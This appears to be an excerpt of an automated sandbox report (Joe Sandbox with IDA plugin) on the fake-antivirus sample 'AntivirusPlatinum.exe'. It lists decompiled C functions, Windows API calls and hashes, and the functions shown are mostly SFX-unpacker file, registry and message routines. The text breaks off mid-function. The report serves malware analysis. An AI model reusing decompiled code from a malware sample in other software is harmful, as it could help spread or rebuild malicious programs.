                                                                                                                                                      0x004094cc

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000400,?,0000005C,00414C88,?,004098EC,?,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,0040D3F9,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe), ref: 004092BF
                                                                                                                                                        • Part of subcall function 00404FDC: SetFilePointer.KERNELBASE(00020000,00000000,00000000,00000001,?,?,?,?,0040A7FA,?,?,0040555D,?,?), ref: 00404FF3
                                                                                                                                                        • Part of subcall function 00404FDC: GetLastError.KERNEL32(?,0040A7FA,?,?,0040555D,?,?), ref: 00405000
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$ErrorLastModuleNamePointer
                                                                                                                                                      • String ID: *messages***$@$a
                                                                                                                                                      • API String ID: 1624790276-2848287086
                                                                                                                                                      • Opcode ID: 6095de22ffa8cc4042a1b9701838ad665518839f05c264bbbc2cc301cf85d679
                                                                                                                                                      • Instruction ID: 84dcd20e4f7640fa0209f036967ba761b6bafe31550b0c330afd5de3d59fc2c4
                                                                                                                                                      • Opcode Fuzzy Hash: 6095de22ffa8cc4042a1b9701838ad665518839f05c264bbbc2cc301cf85d679
                                                                                                                                                      • Instruction Fuzzy Hash: 7C61F371904244EEEB31DB24CC84BAF3BA49B45314F1085BFE956B62D3CA788E46CB19
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040B9B0(void* __esi, intOrPtr _a4) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				int _v12;
                                                                                                                                                      				int _v16;
                                                                                                                                                      				char _v1040;
                                                                                                                                                      				char _v2064;
                                                                                                                                                      				long _t13;
                                                                                                                                                      
                                                                                                                                                      				if( *0x419f90 != 0) {
                                                                                                                                                      					E0040B901( &_v1040, _a4);
                                                                                                                                                      					_t13 = RegOpenKeyExA(0x80000001, "Software\\WinRAR SFX", 0, 1,  &_v8); // executed
                                                                                                                                                      					if(_t13 == 0) {
                                                                                                                                                      						_v12 = 0x400;
                                                                                                                                                      						if(RegQueryValueExA(_v8,  &_v1040, 0,  &_v16,  &_v2064,  &_v12) == 0) {
                                                                                                                                                      							E0040A477(_a4,  &_v2064);
                                                                                                                                                      						}
                                                                                                                                                      						return RegCloseKey(_v8);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t13;
                                                                                                                                                      			}









                                                                                                                                                      0x0040b9c0
                                                                                                                                                      0x0040b9cc
                                                                                                                                                      0x0040b9e3
                                                                                                                                                      0x0040b9ec
                                                                                                                                                      0x0040ba09
                                                                                                                                                      0x0040ba18
                                                                                                                                                      0x0040ba24
                                                                                                                                                      0x0040ba24
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ba2c
                                                                                                                                                      0x0040b9ec
                                                                                                                                                      0x0040ba33

                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000001,Software\WinRAR SFX,00000000,00000001,0000000C,?,00000022), ref: 0040B9E3
                                                                                                                                                      • RegQueryValueExA.ADVAPI32(0000000C,?,00000000,00000000,?,?), ref: 0040BA10
                                                                                                                                                      • RegCloseKey.ADVAPI32(0000000C), ref: 0040BA2C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                      • String ID: Software\WinRAR SFX
                                                                                                                                                      • API String ID: 3677997916-754673328
                                                                                                                                                      • Opcode ID: e62ed5703ae6a494e4b9bedd5e0fb16a0a0be06cfa19cc6cd0b7656d05d051e7
                                                                                                                                                      • Instruction ID: 6051d0f75422db7d6b46e309ec543619c6146246f4a2ef773cf3b5fda2ce6207
                                                                                                                                                      • Opcode Fuzzy Hash: e62ed5703ae6a494e4b9bedd5e0fb16a0a0be06cfa19cc6cd0b7656d05d051e7
                                                                                                                                                      • Instruction Fuzzy Hash: 8A011A75500208BEEB11DB90DD45FDE7BBCEB04748F0081A2BB04F1090E7B49A59DB98
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040A82D() {
                                                                                                                                                      				struct tagMSG _v32;
                                                                                                                                                      				int _t6;
                                                                                                                                                      				long _t12;
                                                                                                                                                      
                                                                                                                                                      				_t6 = PeekMessageA( &_v32, 0, 0, 0, 0); // executed
                                                                                                                                                      				if(_t6 != 0) {
                                                                                                                                                      					GetMessageA( &_v32, 0, 0, 0);
                                                                                                                                                      					TranslateMessage( &_v32);
                                                                                                                                                      					_t12 = DispatchMessageA( &_v32); // executed
                                                                                                                                                      					return _t12;
                                                                                                                                                      				}
                                                                                                                                                      				return _t6;
                                                                                                                                                      			}






                                                                                                                                                      0x0040a83e
                                                                                                                                                      0x0040a846
                                                                                                                                                      0x0040a84f
                                                                                                                                                      0x0040a859
                                                                                                                                                      0x0040a863
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040a863
                                                                                                                                                      0x0040a86b

                                                                                                                                                      APIs
                                                                                                                                                      • PeekMessageA.USER32(0040A7FA,00000000,00000000,00000000,00000000), ref: 0040A83E
                                                                                                                                                      • GetMessageA.USER32 ref: 0040A84F
                                                                                                                                                      • TranslateMessage.USER32(?), ref: 0040A859
                                                                                                                                                      • DispatchMessageA.USER32 ref: 0040A863
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Message$DispatchPeekTranslate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4217535847-0
                                                                                                                                                      • Opcode ID: 043e15b43511c9b9b8142bd98649a3dbf74fd64d15c554c5aa4f09793c13f6a9
                                                                                                                                                      • Instruction ID: 9bc01b0654b97ff9a9f2776f7e551ab648acc0d6ddbdf71c92faa3387c9e9ffb
                                                                                                                                                      • Opcode Fuzzy Hash: 043e15b43511c9b9b8142bd98649a3dbf74fd64d15c554c5aa4f09793c13f6a9
                                                                                                                                                      • Instruction Fuzzy Hash: 53E0ED72C0212AA7CB106BF29E0CCDF7F6CEE052517008461B506E2054D678D215C7F5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                                      			E00404FDC(void* __ecx, signed int __edx) {
                                                                                                                                                      				long _v8;
                                                                                                                                                      				long _t8;
                                                                                                                                                      				signed int _t11;
                                                                                                                                                      				signed int _t17;
                                                                                                                                                      				long _t20;
                                                                                                                                                      				void* _t23;
                                                                                                                                                      
                                                                                                                                                      				_t17 = __edx;
                                                                                                                                                      				_push(__ecx);
                                                                                                                                                      				_v8 = _v8 & 0x00000000;
                                                                                                                                                      				_t23 = __ecx;
                                                                                                                                                      				_t8 = SetFilePointer( *(__ecx + 4), 0,  &_v8, 1); // executed
                                                                                                                                                      				_t20 = _t8;
                                                                                                                                                      				if(_t20 != 0xffffffff || GetLastError() == 0) {
                                                                                                                                                      					L4:
                                                                                                                                                      					asm("cdq");
                                                                                                                                                      					_t11 = E00401030(_v8, _t17, 0, 1) + _t20;
                                                                                                                                                      					asm("adc edx, ecx");
                                                                                                                                                      				} else {
                                                                                                                                                      					if( *((char*)(_t23 + 0x14)) == 0) {
                                                                                                                                                      						_t11 = _t17 | 0xffffffff;
                                                                                                                                                      					} else {
                                                                                                                                                      						E0040336D(0x414c7c, _t23 + 0x17);
                                                                                                                                                      						goto L4;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t11;
                                                                                                                                                      			}









                                                                                                                                                      0x00404fdc
                                                                                                                                                      0x00404fdf
                                                                                                                                                      0x00404fe0
                                                                                                                                                      0x00404fec
                                                                                                                                                      0x00404ff3
                                                                                                                                                      0x00404ff9
                                                                                                                                                      0x00404ffe
                                                                                                                                                      0x0040501e
                                                                                                                                                      0x00405023
                                                                                                                                                      0x0040502f
                                                                                                                                                      0x00405031
                                                                                                                                                      0x0040500a
                                                                                                                                                      0x0040500e
                                                                                                                                                      0x0040503a
                                                                                                                                                      0x00405010
                                                                                                                                                      0x00405019
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405019
                                                                                                                                                      0x0040500e
                                                                                                                                                      0x00405036

                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointer.KERNELBASE(00020000,00000000,00000000,00000001,?,?,?,?,0040A7FA,?,?,0040555D,?,?), ref: 00404FF3
                                                                                                                                                      • GetLastError.KERNEL32(?,0040A7FA,?,?,0040555D,?,?), ref: 00405000
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                      • String ID: |LA
                                                                                                                                                      • API String ID: 2976181284-4290591017
                                                                                                                                                      • Opcode ID: 6008ec0fcc46e3801aa7134edd199233a4ed08c658005814deddaad1fa34d866
                                                                                                                                                      • Instruction ID: 2e480e1ce5fe1b1d35513c41c649f52fd4b6def30c48a15a8177b9897f1f0cd1
                                                                                                                                                      • Opcode Fuzzy Hash: 6008ec0fcc46e3801aa7134edd199233a4ed08c658005814deddaad1fa34d866
                                                                                                                                                      • Instruction Fuzzy Hash: 4BF0F6727406007BE724A669CD0ABDF36ADDBC1764F14423AB511E22D0DAF89D0096AD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E004115FD(struct HINSTANCE__** __ecx) {
                                                                                                                                                      				struct HINSTANCE__* _t3;
                                                                                                                                                      				intOrPtr* _t4;
                                                                                                                                                      				struct HINSTANCE__** _t11;
                                                                                                                                                      				struct HINSTANCE__* _t12;
                                                                                                                                                      
                                                                                                                                                      				_t11 = __ecx;
                                                                                                                                                      				_t3 =  *__ecx;
                                                                                                                                                      				if(_t3 != 0) {
                                                                                                                                                      					FreeLibrary(_t3); // executed
                                                                                                                                                      				}
                                                                                                                                                      				_t12 =  *(_t11 + 4);
                                                                                                                                                      				if(_t12 != 0) {
                                                                                                                                                      					FreeLibrary(_t12);
                                                                                                                                                      				}
                                                                                                                                                      				_t4 =  *0x41fff0; // 0x768ac100
                                                                                                                                                      				return  *((intOrPtr*)( *_t4 + 8))(_t4);
                                                                                                                                                      			}







                                                                                                                                                      0x004115fe
                                                                                                                                                      0x00411600
                                                                                                                                                      0x0041160b
                                                                                                                                                      0x0041160e
                                                                                                                                                      0x0041160e
                                                                                                                                                      0x00411610
                                                                                                                                                      0x00411615
                                                                                                                                                      0x00411618
                                                                                                                                                      0x00411618
                                                                                                                                                      0x0041161a
                                                                                                                                                      0x00411627

                                                                                                                                                      APIs
                                                                                                                                                      • FreeLibrary.KERNELBASE(00000000,00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,0040D46A), ref: 0041160E
                                                                                                                                                      • FreeLibrary.KERNELBASE(?,00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,0040D46A), ref: 00411618
                                                                                                                                                      Strings
                                                                                                                                                      • C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe, xrefs: 004115FD
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                      • String ID: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                      • API String ID: 3664257935-2058154495
                                                                                                                                                      • Opcode ID: 5a911f39bc500288cfb1d4df0ab43fc2f250b8dfc3319a74055b1690a66653f5
                                                                                                                                                      • Instruction ID: 62aa9ad67f2bc5607cfcf4aabbf5f4da411644a76b014e87a6fdd9beea94847b
                                                                                                                                                      • Opcode Fuzzy Hash: 5a911f39bc500288cfb1d4df0ab43fc2f250b8dfc3319a74055b1690a66653f5
                                                                                                                                                      • Instruction Fuzzy Hash: 2DE012327011209B86209F59EC049CBF3ECAFD971131A446BF945E3320C7A5EC428AAC
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                      			E00405097(void* __ecx, CHAR* _a4, WCHAR* _a8, char _a12, char _a15, long _a16) {
                                                                                                                                                      				long _v8;
                                                                                                                                                      				void* _t41;
                                                                                                                                                      				void* _t44;
                                                                                                                                                      				WCHAR* _t51;
                                                                                                                                                      				long _t58;
                                                                                                                                                      				void* _t59;
                                                                                                                                                      				void* _t62;
                                                                                                                                                      
                                                                                                                                                      				_t55 = __ecx;
                                                                                                                                                      				_push(__ecx);
                                                                                                                                                      				_t62 = __ecx;
                                                                                                                                                      				 *((intOrPtr*)(__ecx + 0xc18)) = 0;
                                                                                                                                                      				if( *((intOrPtr*)(__ecx + 0x16)) != 0) {
                                                                                                                                                      					_a12 = 1;
                                                                                                                                                      				}
                                                                                                                                                      				_v8 = 0x80000000;
                                                                                                                                                      				if(_a16 != 0) {
                                                                                                                                                      					_v8 = 0xc0000000;
                                                                                                                                                      				}
                                                                                                                                                      				_a16 = 1;
                                                                                                                                                      				if(_a12 != 0) {
                                                                                                                                                      					_a16 = 3;
                                                                                                                                                      				}
                                                                                                                                                      				_t58 = (0 |  *((intOrPtr*)(_t62 + 0x15)) != 0x00000000) - 0x00000001 & 0x08000000;
                                                                                                                                                      				if(E00406EA5() == 0) {
                                                                                                                                                      					L10:
                                                                                                                                                      					_t41 = CreateFileA(_a4, _v8, _a16, 0, 3, _t58, 0); // executed
                                                                                                                                                      				} else {
                                                                                                                                                      					_t51 = _a8;
                                                                                                                                                      					if(_t51 == 0 ||  *_t51 == 0) {
                                                                                                                                                      						goto L10;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t41 = CreateFileW(_t51, _v8, _a16, 0, 3, _t58, 0); // executed
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t59 = _t41;
                                                                                                                                                      				if(_t59 == 0xffffffff && GetLastError() == 2) {
                                                                                                                                                      					 *((intOrPtr*)(_t62 + 0xc18)) = 1;
                                                                                                                                                      				}
                                                                                                                                                      				_a15 = _t59 != 0xffffffff;
                                                                                                                                                      				 *((char*)(_t62 + 0x12)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t62 + 0xc)) = 0;
                                                                                                                                                      				 *((char*)(_t62 + 0x10)) = 0;
                                                                                                                                                      				if(_a15 != 0) {
                                                                                                                                                      					 *(_t62 + 4) = _t59;
                                                                                                                                                      					if(_a8 == 0) {
                                                                                                                                                      						 *((short*)(_t62 + 0x418)) = 0;
                                                                                                                                                      					} else {
                                                                                                                                                      						E0040E338(_t62 + 0x418, _a8);
                                                                                                                                                      					}
                                                                                                                                                      					_t44 = _t62 + 0x17;
                                                                                                                                                      					if(_a4 == 0) {
                                                                                                                                                      						E0040E115(_t55, _a8, _t44, 0x1000000);
                                                                                                                                                      					} else {
                                                                                                                                                      						E0040A477(_t44, _a4);
                                                                                                                                                      					}
                                                                                                                                                      					E00404F07(_t62,  *(_t62 + 4));
                                                                                                                                                      				}
                                                                                                                                                      				return _a15;
                                                                                                                                                      			}










                                                                                                                                                      0x00405097
                                                                                                                                                      0x0040509a
                                                                                                                                                      0x0040509d
                                                                                                                                                      0x004050a2
                                                                                                                                                      0x004050ab
                                                                                                                                                      0x004050ad
                                                                                                                                                      0x004050ad
                                                                                                                                                      0x004050b1
                                                                                                                                                      0x004050bb
                                                                                                                                                      0x004050bd
                                                                                                                                                      0x004050bd
                                                                                                                                                      0x004050c4
                                                                                                                                                      0x004050ce
                                                                                                                                                      0x004050d0
                                                                                                                                                      0x004050d0
                                                                                                                                                      0x004050e5
                                                                                                                                                      0x004050ee
                                                                                                                                                      0x00405110
                                                                                                                                                      0x0040511e
                                                                                                                                                      0x004050f0
                                                                                                                                                      0x004050f0
                                                                                                                                                      0x004050f5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004050fc
                                                                                                                                                      0x00405108
                                                                                                                                                      0x00405108
                                                                                                                                                      0x004050f5
                                                                                                                                                      0x00405124
                                                                                                                                                      0x00405129
                                                                                                                                                      0x00405136
                                                                                                                                                      0x00405136
                                                                                                                                                      0x00405143
                                                                                                                                                      0x00405147
                                                                                                                                                      0x0040514a
                                                                                                                                                      0x0040514d
                                                                                                                                                      0x00405153
                                                                                                                                                      0x00405155
                                                                                                                                                      0x0040515b
                                                                                                                                                      0x00405170
                                                                                                                                                      0x0040515d
                                                                                                                                                      0x00405167
                                                                                                                                                      0x00405167
                                                                                                                                                      0x00405177
                                                                                                                                                      0x0040517d
                                                                                                                                                      0x00405193
                                                                                                                                                      0x0040517f
                                                                                                                                                      0x00405183
                                                                                                                                                      0x00405183
                                                                                                                                                      0x0040519d
                                                                                                                                                      0x0040519d
                                                                                                                                                      0x004051a9

                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,-00000001,00000000,00000000,?,00000000,?,?,00409309,?,00000000,00000001), ref: 00405108
                                                                                                                                                      • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,-00000001,00000000,00000000,?,00000000,?,?,00409309,?,00000000,00000001), ref: 0040511E
                                                                                                                                                        • Part of subcall function 0040E115: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,00000000,?,?,00405198,?,?,01000000,?), ref: 0040E12F
                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,00409309,?,00000000,00000001,00000000,00000000,?,?,?,0000005C,00414C88), ref: 0040512B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile$ByteCharErrorLastMultiWide
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 158210224-0
                                                                                                                                                      • Opcode ID: 1b80a3972cda857646efe7b82b324378e3a3be6fb2e88d9081803b5179a2740f
                                                                                                                                                      • Instruction ID: 427e4f42cfb4fe8a4b8f94c3947b3ca18014e29d0b63896657673fbab71910d3
                                                                                                                                                      • Opcode Fuzzy Hash: 1b80a3972cda857646efe7b82b324378e3a3be6fb2e88d9081803b5179a2740f
                                                                                                                                                      • Instruction Fuzzy Hash: 2031F071800788AFDB218F60C844BDF3BA9EB41314F14456EF951AB281C3799E949BA9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E004052D2(void* __ecx, void* _a4, long _a8) {
                                                                                                                                                      				long _v8;
                                                                                                                                                      				int _t14;
                                                                                                                                                      				signed int _t15;
                                                                                                                                                      				long _t16;
                                                                                                                                                      				void* _t22;
                                                                                                                                                      
                                                                                                                                                      				_push(__ecx);
                                                                                                                                                      				_t22 = __ecx;
                                                                                                                                                      				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
                                                                                                                                                      					if(_a8 > 0x4e20) {
                                                                                                                                                      						_a8 = 0x4e20;
                                                                                                                                                      					}
                                                                                                                                                      					 *(_t22 + 4) = GetStdHandle(0xfffffff6);
                                                                                                                                                      				}
                                                                                                                                                      				_t14 = ReadFile( *(_t22 + 4), _a4, _a8,  &_v8, 0); // executed
                                                                                                                                                      				if(_t14 != 0) {
                                                                                                                                                      					_t15 = _v8;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t16 = E00405051(_t22);
                                                                                                                                                      					if(_t16 == 0 || _a8 <= 0x4e20) {
                                                                                                                                                      						if( *((intOrPtr*)(_t22 + 0xc)) != 1) {
                                                                                                                                                      							L11:
                                                                                                                                                      							_t15 = _t16 | 0xffffffff;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t16 = GetLastError();
                                                                                                                                                      							if(_t16 != 0x6d) {
                                                                                                                                                      								goto L11;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t15 = 0;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						_t15 = E004052D2(_t22, _a4, 0x4e20);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t15;
                                                                                                                                                      			}








                                                                                                                                                      0x004052d5
                                                                                                                                                      0x004052d8
                                                                                                                                                      0x004052e3
                                                                                                                                                      0x004052e8
                                                                                                                                                      0x004052ea
                                                                                                                                                      0x004052ea
                                                                                                                                                      0x004052f5
                                                                                                                                                      0x004052f5
                                                                                                                                                      0x00405307
                                                                                                                                                      0x0040530f
                                                                                                                                                      0x00405348
                                                                                                                                                      0x00405311
                                                                                                                                                      0x00405313
                                                                                                                                                      0x0040531a
                                                                                                                                                      0x00405332
                                                                                                                                                      0x00405343
                                                                                                                                                      0x00405343
                                                                                                                                                      0x00405334
                                                                                                                                                      0x00405334
                                                                                                                                                      0x0040533d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040533f
                                                                                                                                                      0x0040533f
                                                                                                                                                      0x0040533f
                                                                                                                                                      0x0040533d
                                                                                                                                                      0x00405321
                                                                                                                                                      0x00405327
                                                                                                                                                      0x00405327
                                                                                                                                                      0x0040531a
                                                                                                                                                      0x0040534e

                                                                                                                                                      APIs
                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6,?,00414C7C,?,?,004056BF,000000FF,?,00000000,?,00000000), ref: 004052EF
                                                                                                                                                      • ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,?,00414C7C,?,?,004056BF,000000FF,?,00000000,?,00000000), ref: 00405307
                                                                                                                                                      • GetLastError.KERNEL32(?,004056BF,000000FF,?,00000000,?,00000000), ref: 00405334
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFileHandleLastRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1699850967-0
                                                                                                                                                      • Opcode ID: f03b5bc69443adbf993c94e0b4c472282daeb6f114824d5fbcb0b7a7ba7e5156
                                                                                                                                                      • Instruction ID: d972bf192e1d3f9598e18863326a66fe736dca606b714a29153f01d36eea9568
                                                                                                                                                      • Opcode Fuzzy Hash: f03b5bc69443adbf993c94e0b4c472282daeb6f114824d5fbcb0b7a7ba7e5156
                                                                                                                                                      • Instruction Fuzzy Hash: E6015B31500904FBCF209B51C9048AFBB69EB413B4B10823BED29A62D0C7B8D950DF99
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00405898(void* __eflags, CHAR* _a4, WCHAR* _a8, char _a12, intOrPtr _a16) {
                                                                                                                                                      				void* _t6;
                                                                                                                                                      				int _t7;
                                                                                                                                                      				long _t8;
                                                                                                                                                      				void* _t9;
                                                                                                                                                      				WCHAR* _t14;
                                                                                                                                                      
                                                                                                                                                      				_t6 = E00406EA5();
                                                                                                                                                      				_t14 = _a8;
                                                                                                                                                      				if(_t6 == 0 || _t14 == 0 ||  *_t14 == 0) {
                                                                                                                                                      					_t7 = CreateDirectoryA(_a4, 0); // executed
                                                                                                                                                      				} else {
                                                                                                                                                      					_t7 = CreateDirectoryW(_t14, 0);
                                                                                                                                                      				}
                                                                                                                                                      				if(_t7 == 0) {
                                                                                                                                                      					_t8 = GetLastError();
                                                                                                                                                      					__eflags = _t8 - 2;
                                                                                                                                                      					if(_t8 == 2) {
                                                                                                                                                      						L12:
